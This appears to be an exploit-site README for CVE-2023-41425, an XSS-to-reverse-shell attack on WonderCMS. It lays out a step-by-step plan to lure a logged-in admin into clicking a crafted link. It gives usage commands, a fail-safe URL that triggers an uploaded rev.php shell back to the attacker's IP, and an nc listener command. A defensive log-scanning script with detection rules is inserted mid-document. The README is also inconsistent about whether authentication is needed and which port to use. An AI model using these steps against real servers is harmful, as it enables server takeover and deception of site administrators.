## https://sploitus.com/exploit?id=2F4E3DBE-F5A4-5CC2-9DED-5A6FC9264EA6
# CVE-2023-41425-WonderCMS-Authenticated-RCE
## Description
WonderCMS v3.2.0 through v3.4.2 is vulnerable. Remote attackers can take full control of the server using a Cross-Site Scripting (XSS) exploit (for educational purposes only). Here's the game plan:
## How it works
The exploit abuses the installModule component of WonderCMS to sneak in a crafted script that runs arbitrary code.
## The Setup
* Tool: exploit.py
* What you need:
  - Target URL where WonderCMS is installed (no admin password required).
  - Your attacker machine's IP.
  - A port for your reverse shell listener.
## Step-by-Step Execution
1. The script generates a file called xss.js. This JavaScript payload is designed to exploit the reflected XSS.
2. It spits out a malicious link. You'll send that link to the admin.
3. The magic happens when the admin (a logged-in user) opens or clicks your link:
   - Background requests fire from the admin's browser without their consent.
   - A reverse shell payload is uploaded using the theme/plugin upload feature.
4. Once uploaded, the payload executes and grants you a reverse shell connection straight to the target server.
## Usage
```sh
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>
```
Example:
```sh
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234
```
## Fail-Safe
If the reverse shell doesn't trigger automatically, just head over to:
```sh
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>
```
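From the defender's side, the two server-visible traces of this chain are the installModule request fired from the admin's browser and the direct request to a PHP file dropped under themes/. The following log scanner is an added example, not part of this repository: it runs two rules over constructed Apache combined-format log lines (the `installModule` query parameter name and the sample hosts are assumptions for illustration).

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /loginURL HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /?installModule=http://198.51.100.7/revshell.zip&type=themes HTTP/1.1" 200 88 "http://cms.example/loginURL" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2024:10:00:15 +0000] "GET /themes/revshell-main/rev.php?lhost=198.51.100.7&lport=1234 HTTP/1.1" 200 0 "-" "curl/8.0"
10.0.0.5 - - [01/Jan/2024:10:01:00 +0000] "GET /themes/default/css/style.css HTTP/1.1" 200 2048 "http://cms.example/" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Return (rule, detail) for a suspicious request, or None for benign traffic."""
    url = urlsplit(entry["target"])
    qs = parse_qs(url.query)
    # Rule 1: a module install is a rare admin action; record the host the
    # module was fetched from so an analyst can confirm it was intended.
    # (Parameter name 'installModule' is assumed for this example.)
    if "installModule" in qs:
        src = urlsplit(qs["installModule"][0]).hostname or "?"
        return ("module-install", f"{entry['ip']} installed a module from {src}")
    # Rule 2: WonderCMS never serves PHP directly out of themes/ or plugins/;
    # a request that hits one usually means a dropped web shell is being used.
    if re.fullmatch(r"/(themes|plugins)/.*\.php", url.path):
        return ("direct-module-php", f"{entry['ip']} requested {url.path}")
    return None

def scan(log_text):
    """Run both rules over a whole log and return the list of findings."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and (hit := classify(entry)):
            findings.append(hit)
    return findings

if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_LOG):
        print(f"[{rule}] {detail}")
```

Rule 1 fires on every install so that a legitimate one is confirmed rather than silently ignored; rule 2 is the higher-confidence signal and is also cheap to enforce at the web server by denying PHP execution under those directories.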
## Note
Remember to start a listener before running the exploit, on the same port you pass as <YOUR_PORT> (the command below uses 4444, while the usage example above passes 1234):
```sh
nc -lvp 4444
```
## Credit
prodigiousMind for discovering and reporting the vulnerability: https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413